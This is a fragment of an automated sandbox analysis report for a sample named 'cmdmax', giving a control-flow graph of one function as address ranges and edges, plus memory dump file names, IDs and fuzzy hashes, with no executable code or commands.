                        control_flow_graph 637 404460-40446c 638 404472-404485 call 404ef0 637->638 639 4046a3-4046af 637->639 638->639 642 40448b-40448f 638->642 642->639 643 404495-4044ad 642->643 644 4044c2-4044c9 643->644 645 4044af-4044bd call 404710 643->645 647 404572-40458e call 4046b0 644->647 648 4044cf-4044d4 644->648 645->644 658 404590-404593 647->658 659 4045da-4045df 647->659 650 4044d6-4044dd 648->650 651 4044f9-4044fe 648->651 650->651 653 4044df-4044e6 call 402820 650->653 655 404500-404509 651->655 656 40450a-404511 651->656 653->647 671 4044ec-4044f8 653->671 660 404513-404524 call 403ea0 656->660 661 40453e-404545 656->661 658->659 666 404595-40459a 658->666 663 4045e5-4045e7 659->663 664 404699-4046a2 659->664 675 404533-404538 660->675 676 404526-404532 660->676 661->647 662 404547-404558 call 403ea0 661->662 683 404567-40456c 662->683 684 40455a-404566 662->684 669 4045e9 663->669 670 4045eb-4045fe call 404e80 663->670 672 4045d1-4045d8 666->672 673 40459c-4045ad call 404b20 666->673 669->670 690 404600-40460c 670->690 691 40460d-404616 670->691 678 404622-404627 672->678 687 4045be-4045cd call 404e80 673->687 688 4045af-4045bc 673->688 675->661 681 404629-404646 call 403ea0 678->681 682 40468f-404698 678->682 681->682 696 404648-40468c SetEnvironmentVariableA call 404b20 681->696 683->647 687->678 697 4045cf 687->697 688->687 688->688 694 40461d 691->694 694->678 696->682 697->694
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8U$8U
                        • API String ID: 0-3775541337
                        • Opcode ID: 279e0f3b3c639ea789faf66da0ce8ed5188860ee897f02ffd9ec8a6a7380b589
                        • Instruction ID: a15cc9a720b6fc96f73c426fe8e84c72349cbb01d9c51f1ad63f8179ffeffdd9
                        • Opcode Fuzzy Hash: 279e0f3b3c639ea789faf66da0ce8ed5188860ee897f02ffd9ec8a6a7380b589
                        • Instruction Fuzzy Hash: 6E61E5F6A04201AFD7109E68FC007677794EBC1325F04067EEA11963D1E77EE948CA9A